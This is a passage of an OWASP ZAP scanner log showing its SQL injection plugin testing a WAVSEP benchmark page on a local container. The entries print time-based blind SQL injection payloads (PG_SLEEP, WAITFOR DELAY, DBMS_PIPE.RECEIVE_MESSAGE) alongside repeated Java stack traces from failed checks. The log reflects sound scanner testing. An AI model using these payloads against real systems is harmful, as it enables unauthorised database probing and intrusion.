6584 FROM PG_SLEEP(5))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND 6584=(SELECT 6584 FROM PG_SLEEP(5)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922493 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') AND 8815=(SELECT 8815 FROM PG_SLEEP(5)) AND ('Gagm'='Gagm] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') AND 8815=(SELECT 8815 FROM PG_SLEEP(5)) AND ('Gagm'='Gagm at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922501 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' AND 7125=(SELECT 7125 FROM PG_SLEEP(5)) AND 'NtFE'='NtFE] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' AND 7125=(SELECT 7125 FROM PG_SLEEP(5)) AND 'NtFE'='NtFE at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922503 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' AND 5817=(SELECT 5817 FROM PG_SLEEP(5)) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' AND 5817=(SELECT 5817 FROM PG_SLEEP(5)) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922504 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND 3989=(SELECT 3989 FROM PG_SLEEP(5))-- Wgup] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND 3989=(SELECT 3989 FROM PG_SLEEP(5))-- Wgup at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922507 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND (3830=3830] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND (3830=3830 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922509 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922510 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND ('flxI'='flxI] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND ('flxI'='flxI at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922511 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND 'bxkd'='bxkd] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND 'bxkd'='bxkd at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922512 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922514 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- yEja] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- yEja at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922515 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) AND 8401=DBMS_PIPE.RECEIVE_MESSAGE(CHR(71)||CHR(110)||CHR(98)||CHR(122),5) AND (2071=2071] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) AND 8401=DBMS_PIPE.RECEIVE_MESSAGE(CHR(71)||CHR(110)||CHR(98)||CHR(122),5) AND (2071=2071 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922517 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND 7035=DBMS_PIPE.RECEIVE_MESSAGE(CHR(117)||CHR(113)||CHR(108)||CHR(89),5)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND 7035=DBMS_PIPE.RECEIVE_MESSAGE(CHR(117)||CHR(113)||CHR(108)||CHR(89),5) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922518 [ZAP-ActiveScanner-1] WARN 